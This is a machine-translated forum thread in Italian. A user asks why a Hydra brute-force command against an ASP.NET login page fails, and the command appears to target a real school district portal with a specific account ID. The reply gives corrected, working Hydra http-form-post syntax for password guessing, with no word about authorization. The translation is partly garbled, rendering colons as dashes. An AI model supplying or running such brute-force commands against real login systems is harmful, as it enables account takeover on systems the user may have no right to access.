Forza brutale usando l'idra

Naviga le tue risposte
0

Sto provando a fare un attacco di forza bruta su un sistema e ho un elenco completo delle parole possibili perché usano un formato davvero semplice ma quando ho provato hydra con le seguenti risposte, mi ha dato un errore dicendo che

Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-19 22:02:39 [ERROR] Wrong syntax, requires three arguments separated by a colon which may not be null: /Connect/Login.aspx

Qualche idea su come risolvere il problema?

hydra -l A23432 -P wordlist_1.txt -s 80 -V 0.0.0.0 http-post-form "/Connect/Login.aspx:__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTA5MTEzOTQwNA9kFgJmD2QWAgIDD2QWDAIBD2QWAgITDw8WAh4HVmlzaWJsZWhkZAIFDxYCHgRUZXh0BTJDb3B5cmlnaHQgMjAwOSBIb3VzdG9uIEluZGVwZW5kZW50IFNjaG9vbCBEaXN0cmljdGQCDQ8PFgIeC1Bvc3RCYWNrVXJsBSVodHRwOi8vd3d3LmhvdXN0b25pc2Qub3JnL2RvbWFpbi83ODg4ZGQCDw8PFgIfAgUlaHR0cDovL3d3dy5ob3VzdG9uaXNkLm9yZy9kb21haW4vNzg5NGRkAhEPDxYCHwIFJWh0dHA6Ly93d3cuaG91c3RvbmlzZC5vcmcvZG9tYWluLzc4OTVkZAIVDw8WAh4LTmF2aWdhdGVVcmwFMi4uXEhlbHBcT0NSIC0gUFNDIEhlbHAgR3VpZGUgLSBFbmdsaXNoIFZlcnNpb24ucGRmZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFC2N0bDAwJGltZ0RM1KNKEt%2BzLZA8Z%2BnkUqZ3%2BrVNgP4%3D&__VIEWSTATEGENERATOR=125EDFF6&__PREVIOUSPAGE=eic2obM9HsJVGXjCuBkW_BCXDoR6wcOVTcJrExElqVWm-b3vnFcneVi-Yc52SWRk3vuSeeDAj6xlnRF9h5rqjDrO5hURRKbSQ_cRyvIHbRX7ss3b0&__EVENTVALIDATION=%2FwEWCQLqlo7JBQKVjO6OBwLzw%2BOgBQLA%2FraSCQKd2bA2ApyI9v8JAv2ao%2BgDAqebmbQDAujk6qkJVYCk1DwUcL4617gtTeSpx0D105E%3D&ctl00%24ContentArea%24txtUserName=^USER^&ctl00%24ContentArea%24txtPassword=^PASS^&ctl00%24ContentArea%24btnLogin=Login:Invalid password

    
posta user3501673 20.01.2016 - 05:11
fonte

1 risposta

1

Devi fornire la sintassi corretta. Ecco un esempio: 

hydra [TARGETIP] http-form-post "/TARGETPATH/TARGETPAGE.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt
  • 1 ° campo (prima del 1 ° trattino) = posizione della pagina di destinazione
  • 2 ° campo (prima del 2 ° colon) = utente e amp; parametri password
  • 3 ° campo (dopo il 2 ° trattino) = risposta alla pagina sul tentativo di accesso errato
risposta data 20.01.2016 - 05:59
fonte

Leggi altre domande sui tag

DNS in DMZ o no e architettura del server di posta I catcher IMSI possono rilevare le comunicazioni crittografate? [chiuso]